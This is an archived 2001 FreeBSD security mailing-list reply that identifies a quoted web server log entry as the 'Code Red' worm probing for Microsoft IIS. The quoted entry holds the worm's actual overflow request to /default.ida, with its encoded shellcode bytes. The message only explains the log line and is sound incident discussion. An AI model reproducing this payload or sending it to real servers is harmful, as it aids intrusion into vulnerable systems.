From owner-freebsd-security Sat Jul 21 19:44:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.tgd.net (rand.tgd.net [64.81.67.117]) by hub.freebsd.org (Postfix) with SMTP id AD13137B405 for ; Sat, 21 Jul 2001 19:44:23 -0700 (PDT) (envelope-from sean@mailhost.tgd.net) Received: (qmail 17561 invoked by uid 1001); 21 Jul 2001 21:17:36 -0000 Date: Sat, 21 Jul 2001 14:17:36 -0700 From: Sean Chittenden To: nathan@salvation.unixgeeks.com Cc: freebsd-security@freebsd.org Subject: Re: possible? Message-ID: <20010721141736.V5160@rand.tgd.net> References: <20010721204942.12010.qmail@salvation.unixgeeks.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="pqmPt9oPL4cuP/b5" Content-Disposition: inline In-Reply-To: <20010721204942.12010.qmail@salvation.unixgeeks.com>; from "nathan@salvation.unixgeeks.com" on Sat, Jul 21, 2001 at = 08:49:42PM X-PGP-Key: 0x1EDDFAAD X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD X-Web-Homepage: http://sean.chittenden.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --pqmPt9oPL4cuP/b5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable > 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNN= NNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN= NNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN= NNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%= u9090%u > 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8= b00%u53 > 1b%u53ff%u0078%u0000%u00=3Da HTTP/1.0" 400 332 This is the "Code Red" worm that's been infecting MS IIS boxes. =20 Check out securityfocus.com for more information regarding this. If you're using apache then this is a non-issue and is mearly a fun pasttime. "Oooh! An infected host... and another, and another... ad infinitum (or 219,000 at last count)." You can also get more=20 information from the bugtraq and incidents security mailing lists which=20 are hosted by securityfocus.com. -sc --=20 Sean Chittenden --pqmPt9oPL4cuP/b5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: Sean Chittenden iEYEARECAAYFAjtZ8W8ACgkQn09c7x7d+q1msgCgsvwrf5RZmlUoEHqzZmvWSdbc eccAoMRT7svtZfFa/e/kGty7a07xiEDM =N4rv -----END PGP SIGNATURE----- --pqmPt9oPL4cuP/b5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message